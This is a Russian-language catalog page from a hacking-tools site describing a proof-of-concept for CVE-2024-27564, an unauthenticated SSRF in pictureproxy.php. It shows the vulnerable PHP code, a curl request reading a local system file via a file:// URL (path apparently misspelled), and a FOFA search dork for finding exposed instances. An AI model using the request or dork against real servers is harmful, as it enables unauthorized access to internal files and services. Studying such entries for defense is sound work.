Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-27564 — Доказательство концепции эксплуатации уязвимости CVE-2024-27564, межсерверной подделки запросов (SSRF) в pictureproxy.php, позволяющей неаутентифицированным удаленным злоумышленникам внедрять произвольные URL через параметр url. | Kitploit
Инструменты/GitHubGitHub/chsxthwik/cve-2024-27564
РазведкаАнализ уязвимостейЭксплуатацияСбор информацииВеб-безопасностьRepository Deleted
GitHubchsxthwik/cve-2024-27564

CVE-2024-27564

Доказательство концепции эксплуатации уязвимости CVE-2024-27564, межсерверной подделки запросов (SSRF) в pictureproxy.php, позволяющей неаутентифицированным удаленным злоумышленникам внедрять произвольные URL через параметр url.

Исходный репозиторий не был найден во время последней проверки обновлений Kitploit. Эта страница остаётся доступной для справки, но удалена из результатов поиска.
12462 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-27564

Описание:

Уязвимость в pictureproxy.php позволяет удалённым злоумышленникам выполнять произвольные запросы путём внедрения URL-адресов в параметр url. Эта SSRF-уязвимость может быть использована без аутентификации, что делает её особенно опасной.

Уязвимый код находится в файле pictureproxy.php. Проблема возникает из-за того, что функция не проверяет должным образом параметр url. Переменная $_GET['url'] передаётся функции file_get_contents(), которая получает содержимое по указанному URL. Это может привести к SSRF.

PoC:

<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Запрос Curl:

curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Dorking:

FOFA= "title="ChatGPT个人专用版""

Устранение:

Необходимо правильное управление проверкой входных данных.